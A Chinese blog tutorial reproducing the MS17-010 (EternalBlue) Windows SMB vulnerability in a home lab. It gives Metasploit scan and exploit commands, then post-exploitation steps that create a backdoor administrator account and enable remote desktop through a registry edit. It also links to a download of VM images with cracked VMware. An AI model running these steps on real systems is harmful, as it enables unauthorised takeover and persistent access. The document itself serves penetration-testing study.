漏洞复现 | MS17-010*(永恒之蓝)漏洞复现

原创 已于 2023-03-24 14:41:48 修改 · 3.8k 阅读 ·
大模型引用 4
·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
cknow-ai tokel

cknow-ai 关注

标签
#网络 #windows #web安全 #网络安全
分类 操作系统
于 2023-03-24 14:33:27 首次发布
本文详细介绍了永恒之蓝(MS17-010)漏洞的原理,受影响的Windows版本,以及如何在KaliLinux环境下利用Metasploit进行漏洞扫描和攻击,包括主机发现、445端口扫描、获取靶机shell和控制靶机的步骤。

MS17-010*(永恒之蓝)漏洞复现

目录

一、漏洞概述

1、漏洞介绍

2、漏洞原理

3、影响版本

二、实验条件

1、查看IP

2、测试主机网络连通性

三、漏洞复现

1、主机发现

2、使用MSF的永恒之蓝模块

3、使用MS17-010扫描模块,对靶机进行扫描

4、使用ms17-010攻击模块,对靶机进行攻击

5、得到靶机shell

6、对靶机shell进行控制

四、实验所用设备下载

一、漏洞概述

1、漏洞介绍

  • 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理

  • 永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本

  • 目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、实验条件

  • 靶机(win7):192.168.112.133

  • 攻击机(kali):192.168.112.128

  • 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

1、查看IP

  • 首先,开启kali和win7,查看两台主机的ip地址

  • kali:

  • win7

2、测试主机网络连通性

  • 由此得来,可以ping通,(如果ping不通,测试两边主机的网络连接和win7的防火墙)

三、漏洞复现

1、主机发现

  • 登录kali,使用nmap探测本网段主机

  • nmap 192.168.112.133/24        

  • 可得,目标主机开放了135、139、445、1688、3389端口

  • 而永恒之蓝利用的是445端口的SMB服务,操作系统溢出漏洞

2、使用MSF的永恒之蓝模块

  • 打开MSF

    • msfconsole        #启动msf

  • 搜索ms17-010 代码:

    • search ms17_010      #搜索ms17-010

  • 这里可以得到一些工具,其中

    • auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,

    • exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块

  • 一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

3、使用MS17-010扫描模块,对靶机进行扫描

  • use auxiliary/scanner/smb/smb_ms17_010
#使用模块
  • set rhosts 192.168.112.133
#设置目标ip或网段

  • 出现漏洞

4、使用ms17-010攻击模块,对靶机进行攻击

  • use exploit/windows/smb/ms17_010_eternalblue
#使用模块进行攻击
  • set rhosts 192.168.112.133
#设置目标ip

    • 小贴士:可以用以下代码查看设置选项

    • show options

  • 攻击完成

5、得到靶机shell

  • shell

  • 测试靶机连通性

    • 输入:chcp 65001 可有效解决乱码问题。

6、对靶机shell进行控制

  • 创建新用户

    • net user         #查看所有用户
whoami /user     #查看当前用户的SID
net user hacker 123456 /add
#创建用户并设置密码"123456"

  • 将用户添加至管理员组

    • net localgroup administrators hacker /add
#将用户添加至管理员组

  • 开启远程桌面功能

    • 查看3389端口状态

    • netstat -ano        #查看开放了哪些端口

      • 如图所示并没有开启

      • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 
#开启3389端口

      • 已开启

  • 远程桌面链接靶机(命令要在kail下输入)

    • rdesktop 192.168.112.133:3389
#通过3389端口开启远程桌面

    • 登陆成功

四、实验所用设备下载

  • windows7以及kali镜像文件、vmware16(附带破解)已放置在网盘链接中,请自行下载
  • 也可在评论区留言或私信我哦
  • 感谢支持!!!!!!!
  •  链接 
    • 链接:https://pan.baidu.com/s/1n_elmgr3aKBKf6x-mK51Uw 

提取码:gkkg 

--来自百度网盘超级会员V3的分享

点赞 点赞 23
评论 6
书签 书签 102
永恒之蓝漏洞复现(ms17-010)
渗透之路,攻防之间皆学问
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
通过Metasploit实现MS17-010永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1636
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4645
ms17-010永恒之蓝漏洞复现
永恒之蓝MS17-010漏洞复现+简单的后渗透操作(超详细)
最新发布
Qdh117716的博客
04-10 1203
大家好,这是我在CSDN中的第二篇报告,本文是我在学习永恒之蓝漏洞过程中的完整复现记录。内容包含漏洞原理、利用步骤、后渗透及持久化控制。所有命令均经过亲自测试,截图均为实验现场。如果你也在学习渗透测试,希望这份报告能帮你少走一些弯路。欢迎交流指正。项目内容漏洞编号MS17-010(微软安全公告),包含 CVE-2017-0143 ~ CVE-2017-0148漏洞名称EternalBlue(永恒之蓝漏洞类型SMBv1 协议远程代码执行(RCE),内核级缓冲区溢出影响组件。
MS17-010永恒之蓝漏洞复现(手把手教程,超细!)
qq_46089119的博客
02-06 1万+
ms17-010漏洞利用(本地环境复现)
MS17-010漏洞复现
Al345__的博客
07-01 1825
1、永恒之蓝介绍:永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
linxaiomo
02-20 2万+
漏洞复现MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine3...
MS17-010永恒之蓝漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 6万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
永恒之蓝(ms17-010)漏洞复现,进行简单后渗透信息收集
satasun的博客
05-08 4147
申明 本文章仅供学习使用 环境准备: win7虚拟机(靶机) ip:192.168.56.134 kali虚拟机(攻击机) ip:172.18.20.164 要求:win7虚拟机不要开防火墙,开放445端口,没有打永恒之蓝的补丁 实验开始: 先用nmap扫描一下靶机开了哪几个端口: nmap -Sv -p 1-1000 192.168.56.134 跑了两分钟,发现win7着实开了445端口。接下来直接打开msfconsole来进行攻击。 打开msfconsole会随机跳出图案,每一次打开都不一样
漏洞复现(一):永恒之蓝ms17-010
weixin_47306547的博客
11-02 7099
目录 永恒之蓝简介 SMB协议 SMB原理 漏洞原理 漏洞危害 漏洞复现 实验环境 完整过程 扫描目标主机是否存在该漏洞 实施攻击 漏洞利用 漏洞防御 永恒之蓝简介 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、...
MS17-010永恒之蓝复现
m0_52701599的博客
01-11 606
永恒之蓝漏洞复现
永恒之蓝MS17-010)的复现
Leslieyzz的博客
01-15 786
永恒之蓝MS17-010)的复现
永恒之蓝ms17-010) 漏洞复现
2301_78611138的博客
03-14 1086
这是一款免费的,可下载的框架,通过它可以很容易的获取,开发并对计算机软件漏洞实现攻击。其本身附带数千个已知软件漏洞漏洞攻击工具。
【渗透测试:MS17_010永恒之蓝漏洞复现与分析】
qq_61947585的博客
07-14 3242
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该程序出来不久就被微软通过打补丁修复。
Windows下的MS17-010永恒之蓝漏洞分析与复现
dgjkkhcf的博客
07-20 1万+
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。.........
[永恒之蓝]实战-漏洞复现
流浪法师的博客
02-24 5086
[永恒之蓝]实战-漏洞复现
ms17-010永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
用metasploit(msf)复现MS17-010(经典的永恒之蓝)SMB漏洞
zsisle的博客
07-13 2704
MS17-010漏洞:恶意代码会扫描开放445文件共享端口(SMB)的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。...
复现永恒之蓝漏洞ms17-010)(一)复现
wty923的博客
01-12 431
永恒之蓝漏洞复现
永恒之蓝漏洞复现(详细版)
Zqinglele的博客
03-20 6733
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tokel

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值